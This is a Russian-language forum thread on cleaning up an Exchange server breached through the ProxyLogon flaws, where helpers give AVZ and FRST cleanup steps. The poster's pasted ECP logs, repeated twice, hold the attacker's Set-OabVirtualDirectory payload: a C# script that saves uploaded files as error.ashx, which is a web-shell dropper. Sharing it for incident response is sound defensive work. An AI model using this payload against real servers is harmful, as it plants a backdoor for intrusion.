Выполнил
Решена задача Backball и множество запущенных PS скриптов
- Автор темы Iceman
- Дата начала
- Статус
- Сообщения
- 15,473
- Реакции
- 3,284
Вижу, уже установлена серверная версия. Обновите базы и сделайте полную проверку.
- Сообщения
- 24,709
- Реакции
- 13,562
Патчи для закрытия уязвимости стоят?
Сначала была сделана проверка скриптом Test-ProxyLogon.ps1 , он обнаружил вторжения по данным уязвимостям, потом был выполнен скрипт для их блокировки ExchangeMitigations.ps1, а после установлено Security Update KB5000871
Это из логов ...\ECP\Server, если правильно понимаю как раз момент проникновения:
2021-06-16T10:49:09.811Z,MAIL-*****,ECP.Request,S:TIME=955;S:SID=4771b2a6-9ffc-44e4-81da-8fe664804f0e;S:CMD=Pipeline.1|Get-MailboxRegionalConfiguration;S:REQID=;S:URL=/ecp/about.aspx;S:EX=;S:ACTID=dd7f1584-7516-4a74-980c-33c517fdd69c;S:RS=1;S:BLD=15.0.847.32
2021-06-16T10:49:10.514Z,MAIL-*****,ECP.Request,S:TIME=50;S:SID=e1929262-01d3-4561-af8d-e44736c661a5;S:CMD=Get-InboxRule;S:REQID=;S:URL=/ecp/RulesEditor/InboxRules.svc/GetList?msExchEcpCanary=671IohM2pUSrWkh-_bkoahzRXV-0MNkIkzD28VKRAsafdp5qET18mU7uAiK7LzWqvmiX3E4_tlg.;S:EX=;S:ACTID=b414913c-2ec4-4d87-b9fb-a5edddff5788;S:RS=0;S:BLD=15.0.847.32
2021-06-16T10:49:12.811Z,MAIL-*****,ECP.Request,S:TIME=491;S:SID=4771b2a6-9ffc-44e4-81da-8fe664804f0e;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''OAB*''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=Sr4Ib327pUSHa0ByB1xWjw2ZULFGMtkIlY8L-m8bzQDBnMpRASeF_cy_OYid-XmmVX5KpoDQmcA.;S:EX=;S:ACTID=f5156e73-b537-4915-bb14-93455a1378b9;S:RS=1;S:BLD=15.0.847.32
2021-06-16T10:49:14.514Z,MAIL-*****,ECP.Request,"S:TIME=1146;S:SID=4771b2a6-9ffc-44e4-81da-8fe664804f0e;'S:CMD=Set-OabVirtualDirectory.ExternalUrl=''<script Language=""c#"" runat=""server"">void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(""error.ashx""));}}</script>''.Identity=''04310b02-1a5c-4dd3-8bc3-0d8aa566acc2''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=Sr4Ib327pUSHa0ByB1xWjw2ZULFGMtkIlY8L-m8bzQDBnMpRASeF_cy_OYid-XmmVX5KpoDQmcA.;'S:EX=Microsoft.Exchange.Data.DataValidationException:Задано недопустимое значение свойства (""<script Language=""c#"" runat=""server"">void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(""error.ashx""));}}</script>""). Проверьте значение и укажите допустимый URL-адрес (Absolute).\r\n';S:ACTID=13f9c94d-66ba-4375-a8e5-651a88bce1f9;S:RS=0;S:BLD=15.0.847.32"
2021-06-16T10:49:16.139Z,MAIL-*****,ECP.LongRunning,S:TIME=1306;S:SID=4771b2a6-9ffc-44e4-81da-8fe664804f0e;'S:CMD=Get-OABVirtualDirectory.Identity=''04310b02-1a5c-4dd3-8bc3-0d8aa566acc2''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=Sr4Ib327pUSHa0ByB1xWjw2ZULFGMtkIlY8L-m8bzQDBnMpRASeF_cy_OYid-XmmVX5KpoDQmcA.;S:EX=;S:ACTID=a8c58613-ae05-4d77-bbde-f830e821d923;S:RS=1;S:BLD=15.0.847.32
2021-06-16T10:49:16.389Z,MAIL-*****,ECP.LongRunning,S:TIME=217;S:SID=4771b2a6-9ffc-44e4-81da-8fe664804f0e;'S:CMD=Get-ExchangeServer.Identity=''MAIL-*****''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=Sr4Ib327pUSHa0ByB1xWjw2ZULFGMtkIlY8L-m8bzQDBnMpRASeF_cy_OYid-XmmVX5KpoDQmcA.;S:EX=;S:ACTID=a8c58613-ae05-4d77-bbde-f830e821d923;S:RS=1;S:BLD=15.0.847.32
2021-06-16T10:49:28.530Z,MAIL-*****,ECP.LongRunning,S:TIME=12132;S:SID=4771b2a6-9ffc-44e4-81da-8fe664804f0e;'S:CMD=Remove-OABVirtualDirectory.Force=$true.Identity=''MAIL-*****\OAB (Default Web Site)''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=Sr4Ib327pUSHa0ByB1xWjw2ZULFGMtkIlY8L-m8bzQDBnMpRASeF_cy_OYid-XmmVX5KpoDQmcA.;S:EX=;S:ACTID=a8c58613-ae05-4d77-bbde-f830e821d923;S:RS=0;S:BLD=15.0.847.32
2021-06-16T10:49:34.811Z,MAIL-*****,ECP.LongRunning,S:TIME=6270;S:SID=4771b2a6-9ffc-44e4-81da-8fe664804f0e;'S:CMD=New-OABVirtualDirectory.WebSiteName=''Default Web Site''.Server=''MAIL-*****''.Role=''ClientAccess''.InternalURL=''https://mail-*****.*****.local/OAB''.Path=''C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\OAB''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=Sr4Ib327pUSHa0ByB1xWjw2ZULFGMtkIlY8L-m8bzQDBnMpRASeF_cy_OYid-XmmVX5KpoDQmcA.;S:EX=;S:ACTID=a8c58613-ae05-4d77-bbde-f830e821d923;S:RS=1;S:BLD=15.0.847.32
2021-06-16T10:49:34.843Z,MAIL-*****,ECP.LongRunning,S:TIME=39;S:SID=4771b2a6-9ffc-44e4-81da-8fe664804f0e;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''MAIL-*****\OAB (Default Web Site)''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=Sr4Ib327pUSHa0ByB1xWjw2ZULFGMtkIlY8L-m8bzQDBnMpRASeF_cy_OYid-XmmVX5KpoDQmcA.;S:EX=;S:ACTID=a8c58613-ae05-4d77-bbde-f830e821d923;S:RS=1;S:BLD=15.0.847.32
2021-06-16T10:49:10.514Z,MAIL-*****,ECP.Request,S:TIME=50;S:SID=e1929262-01d3-4561-af8d-e44736c661a5;S:CMD=Get-InboxRule;S:REQID=;S:URL=/ecp/RulesEditor/InboxRules.svc/GetList?msExchEcpCanary=671IohM2pUSrWkh-_bkoahzRXV-0MNkIkzD28VKRAsafdp5qET18mU7uAiK7LzWqvmiX3E4_tlg.;S:EX=;S:ACTID=b414913c-2ec4-4d87-b9fb-a5edddff5788;S:RS=0;S:BLD=15.0.847.32
2021-06-16T10:49:12.811Z,MAIL-*****,ECP.Request,S:TIME=491;S:SID=4771b2a6-9ffc-44e4-81da-8fe664804f0e;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''OAB*''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=Sr4Ib327pUSHa0ByB1xWjw2ZULFGMtkIlY8L-m8bzQDBnMpRASeF_cy_OYid-XmmVX5KpoDQmcA.;S:EX=;S:ACTID=f5156e73-b537-4915-bb14-93455a1378b9;S:RS=1;S:BLD=15.0.847.32
2021-06-16T10:49:14.514Z,MAIL-*****,ECP.Request,"S:TIME=1146;S:SID=4771b2a6-9ffc-44e4-81da-8fe664804f0e;'S:CMD=Set-OabVirtualDirectory.ExternalUrl=''<script Language=""c#"" runat=""server"">void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(""error.ashx""));}}</script>''.Identity=''04310b02-1a5c-4dd3-8bc3-0d8aa566acc2''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=Sr4Ib327pUSHa0ByB1xWjw2ZULFGMtkIlY8L-m8bzQDBnMpRASeF_cy_OYid-XmmVX5KpoDQmcA.;'S:EX=Microsoft.Exchange.Data.DataValidationException:Задано недопустимое значение свойства (""<script Language=""c#"" runat=""server"">void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(""error.ashx""));}}</script>""). Проверьте значение и укажите допустимый URL-адрес (Absolute).\r\n';S:ACTID=13f9c94d-66ba-4375-a8e5-651a88bce1f9;S:RS=0;S:BLD=15.0.847.32"
2021-06-16T10:49:16.139Z,MAIL-*****,ECP.LongRunning,S:TIME=1306;S:SID=4771b2a6-9ffc-44e4-81da-8fe664804f0e;'S:CMD=Get-OABVirtualDirectory.Identity=''04310b02-1a5c-4dd3-8bc3-0d8aa566acc2''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=Sr4Ib327pUSHa0ByB1xWjw2ZULFGMtkIlY8L-m8bzQDBnMpRASeF_cy_OYid-XmmVX5KpoDQmcA.;S:EX=;S:ACTID=a8c58613-ae05-4d77-bbde-f830e821d923;S:RS=1;S:BLD=15.0.847.32
2021-06-16T10:49:16.389Z,MAIL-*****,ECP.LongRunning,S:TIME=217;S:SID=4771b2a6-9ffc-44e4-81da-8fe664804f0e;'S:CMD=Get-ExchangeServer.Identity=''MAIL-*****''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=Sr4Ib327pUSHa0ByB1xWjw2ZULFGMtkIlY8L-m8bzQDBnMpRASeF_cy_OYid-XmmVX5KpoDQmcA.;S:EX=;S:ACTID=a8c58613-ae05-4d77-bbde-f830e821d923;S:RS=1;S:BLD=15.0.847.32
2021-06-16T10:49:28.530Z,MAIL-*****,ECP.LongRunning,S:TIME=12132;S:SID=4771b2a6-9ffc-44e4-81da-8fe664804f0e;'S:CMD=Remove-OABVirtualDirectory.Force=$true.Identity=''MAIL-*****\OAB (Default Web Site)''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=Sr4Ib327pUSHa0ByB1xWjw2ZULFGMtkIlY8L-m8bzQDBnMpRASeF_cy_OYid-XmmVX5KpoDQmcA.;S:EX=;S:ACTID=a8c58613-ae05-4d77-bbde-f830e821d923;S:RS=0;S:BLD=15.0.847.32
2021-06-16T10:49:34.811Z,MAIL-*****,ECP.LongRunning,S:TIME=6270;S:SID=4771b2a6-9ffc-44e4-81da-8fe664804f0e;'S:CMD=New-OABVirtualDirectory.WebSiteName=''Default Web Site''.Server=''MAIL-*****''.Role=''ClientAccess''.InternalURL=''https://mail-*****.*****.local/OAB''.Path=''C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\OAB''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=Sr4Ib327pUSHa0ByB1xWjw2ZULFGMtkIlY8L-m8bzQDBnMpRASeF_cy_OYid-XmmVX5KpoDQmcA.;S:EX=;S:ACTID=a8c58613-ae05-4d77-bbde-f830e821d923;S:RS=1;S:BLD=15.0.847.32
2021-06-16T10:49:34.843Z,MAIL-*****,ECP.LongRunning,S:TIME=39;S:SID=4771b2a6-9ffc-44e4-81da-8fe664804f0e;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''MAIL-*****\OAB (Default Web Site)''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=Sr4Ib327pUSHa0ByB1xWjw2ZULFGMtkIlY8L-m8bzQDBnMpRASeF_cy_OYid-XmmVX5KpoDQmcA.;S:EX=;S:ACTID=a8c58613-ae05-4d77-bbde-f830e821d923;S:RS=1;S:BLD=15.0.847.32
Потом Касперский обнаружил эксплойты в файлах *.aspx и *.ashx из директорий C:\inetpub\wwwroot\aspnet_client и C:\inetpub\wwwroot\aspnet_client\system_web
Последнее редактирование модератором:
Конечно, наблюдаю, отпишусь в любом случае.
- Сообщения
- 24,709
- Реакции
- 13,562
Отлично, удачи!
Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:
Чтобы автоматически удалить все файлы и папки, созданные FRST, в том числе сам инструмент, переименуйте FRST/FRST64.exe в uninstall.exe и запустите его. Процедура требует автоматической перезагрузки.
Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:
- Запустите AVZ.
- Закройте все приложения, и запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
- В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
- Закачайте полученный архив, как описано на этой странице.
- Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: RGhost, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении.
Чтобы автоматически удалить все файлы и папки, созданные FRST, в том числе сам инструмент, переименуйте FRST/FRST64.exe в uninstall.exe и запустите его. Процедура требует автоматической перезагрузки.
- Статус